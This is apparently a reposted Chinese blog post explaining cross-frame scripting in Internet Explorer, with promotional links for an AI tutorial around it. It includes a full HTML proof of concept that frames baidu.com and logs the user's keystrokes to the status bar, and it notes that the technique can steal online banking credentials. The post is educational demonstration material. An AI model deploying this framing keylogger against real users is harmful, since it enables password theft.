1. 程式人生 > >Cross Frame Script 跨框架指令碼 攻擊

Cross Frame Script 跨框架指令碼 攻擊

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow

也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!

               

什麼是Cross Frame Script?

很簡單,做個實驗就知道了。把下面的這段HTML程式碼另存為一個html檔案,然後用ie瀏覽器開啟。

<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () { 
   k = window.event.keyCode; 
   window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onload="this.focus();" onblur="this.focus();" cols="100%">
 <frame src="http://www.baidu.com/" scrolling="auto">
</frameset>
</html>

當你在百度的搜尋框輸入字元時,你會發現左下角的狀態列上出現了你輸入的字元。

Cross Frame Script 原理

利用瀏覽器允許框架(frame)跨站包含其它頁面的漏洞,在主框架的程式碼中加入scirpt,監視、盜取使用者輸入。

Cross Frame Script 危害

一個惡意的站點可以通過用框架包含真的網銀或線上支付網站,獲取使用者賬號和密碼。

更詳細的資料參考,http://www.xs4all.nl/~ppk/js/crosfram.html  

           

給我老師的人工智慧教程打call!http://blog.csdn.net/jiangjunshow

這裡寫圖片描述